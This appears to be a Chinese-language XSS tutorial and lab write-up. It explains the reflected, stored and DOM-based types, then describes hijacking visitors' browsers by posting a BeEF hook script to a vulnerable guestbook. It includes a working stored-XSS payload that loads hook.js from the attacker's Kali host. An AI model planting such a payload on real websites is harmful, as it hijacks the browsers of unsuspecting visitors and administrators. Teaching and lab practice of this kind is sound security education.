xss的分类1
第一种:反射型xss
反射型XSS是最简单的XSS,即输入XSS脚本或输入XSS脚本点击按钮即可完成XSS攻击,同时也称作非持久型XSS。漏洞主要存在于URL地址栏,搜索框等。
第二种:存储型XSS
也叫持久型XSS,主要将XSS代码提交存储在服务器端,下次请求目标页面时不用在提交XSS代码。当目标用户访问该页面获取数据时,XSS代码会从服务器解析之后加载出来,返回到浏览器做正常的HTML和JS解析执行,XSS攻击就发生了。该类型的漏洞主要存在于发帖,回帖评论等模块,以及用户注册等模块。
第三种:DOM-based型XSS攻击
基于DOM的XSS攻击是指通过恶意脚本修改页面的DOM结构,是纯粹发生在客户端的攻击。DOM 型 XSS 攻击中,取出和执行恶意代码由浏览器端完成,属于前端 JavaScript 自身的安全漏洞。
xss原理1
1.反射型XSS
通过在页面上植入恶意链接,诱使用户点击,执行js脚本,所谓反射型XSS就是将用户输入的数据,反射到浏览器执行。
2.存储型XSS
此类XSS漏洞是指,用户输入的数据(恶意代码)可以“存储”在服务端,只要有人访问这个包含有存储型XSS代码的页面,XSS脚本就会在他们的浏览器中执行,这种XSS具有很强的稳定性。
3.DOM型XSS
DOM Based XSS漏洞是基于文档对象模型的一种漏洞。DOM是有个与平台、编程语言无关的接口,它允许程序或脚本动态地访问和更新文档内容、结构和样式,处理后的结果能够成为显示页面的一部分。类似于反射型XSS,但是,这种XSS攻击的实现是通过对DOM的修改实现的。
实验部分:利用Beef劫持被攻击者客户端浏览器。
实验环境搭建。
角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
被攻击者:访问留言簿网站,浏览器被劫持。
1、利用AWVS扫描留言簿网站,发现存在XSS漏洞。
2、在Kali中使用beef生成代码。
启动beef成功后
利用beef生成代码
3、访问http://留言簿网站/message.asp;将以下代码写入网站留言板,
<script src="http://Kali的ip地址:3000/hook.js"></script>
写入成功
4、管理员登录login.htm,审核用户留言。
只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持。
攻击发起后客户端进入的页面